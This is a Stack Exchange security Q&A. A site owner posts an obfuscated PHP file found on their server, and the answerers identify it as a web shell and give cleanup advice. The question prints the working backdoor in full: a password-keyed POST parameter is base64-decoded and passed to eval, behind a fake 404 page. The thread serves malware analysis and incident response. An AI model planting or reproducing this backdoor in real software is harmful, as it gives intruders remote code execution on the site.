-1

I found the following code on my website. What does it do? Is it malicious?

<?php
    @ignore_user_abort(true);
    @set_time_limit(0);
    $getherw3423 = "FFS"."W35"."25KK"."Sfj";
    $rretert454352 = "b"."".""."a"."s".""."".""."e"."".""."6"."".""."4"."_".""."".""."d"."e"."c"."o".""."".""."".""."d".""."e";
    $qwretrqt5234 = "";
    if(!empty($_POST[$getherw3423]) and strlen($_POST[$getherw3423]) > 0 and isset($_POST[$getherw3423])){
        $qwretrqt5234 = $rretert454352($_POST[$getherw3423]);
        @eval($qwretrqt5234);
    } else {
        echo "<html><head>
        <title>404 Page Not Found</title>
        </head><body>
        <h1>Not Found</h1>
        <p>The requested URL was not found.</p>
        </body></html>";
    }
?>
alecxe
  • 1,515
  • 5
  • 19
  • 34
Chris
  • 1
  • 1
  • Judging by it's looking at $_POST, it's doing something with input from the user. The fact that it's obfuscated suggests that it's malicious. – S.L. Barth May 08 '15 at 14:38
  • 3
    Welcome to Information Security! While asking how to [analyse malicious scripts is on topic](http://meta.security.stackexchange.com/a/1768/2344), questions which ask for the work to be done for them are out of scope. There are lots of [related questions](http://security.stackexchange.com/q/88752/2344), also see the "Related" column to the left, that describe how to analyse PHP scripts. – amccormack May 08 '15 at 14:48

3 Answers3

3

Modified PHP shell. Compromise is bad; shell's worse. Best have backups, nuke, change passwords, reload.

Quick legwork:

The string "FFSW3525KKSfj" trivially obtains this result, which is clearly inspired by the same codebase (containing all split base64 reference). Easy pivot from there is "ERROR! CANT DO NOTHING!".

That discovers it's related to this one, with md5 62c8486b3d05c537e5f81efec750937b, there identified as PHP.Shell.95.

This site reports the script in association with sending millions of spam messages, Joomla is related to it associated with installing a component called mod_administrator but the advice relies heavily on random output so I'm not linking. Seems related to this github repo (Vanilla Ice, conditioners). The time frame is about right.

ǝɲǝɲbρɯͽ
  • 429
  • 2
  • 8
  • Thank you very much for the detailed answer and the supporting links. I'll take the actions and advice from all of those responding. Much appreciated. – Chris May 08 '15 at 16:14
1

This code is parsing base64 encoded post data and running it as a script.

My advice to you would be to pull the site that is affected down immediately as any data that is stored in the file system or any connected databases is now at risk. remove database users and prepare to clean up!

There are many run throughs of what you should do in the event that your web site is exploited. I would suggest that you search and follow the advice offered.

Aaron Dobbing
  • 473
  • 3
  • 13
0

It's a simple script that will take an argument passed to it from another script or possibly even the URL, and then run it as arbitrary php code.

So it is only as malicious as the random stranger who installed it for you is, or whoever finds it. Who knows! Maybe you will find the convenience of having your webserver running arbitrary code helpful.

J Kimball
  • 2,137
  • 1
  • 13
  • 19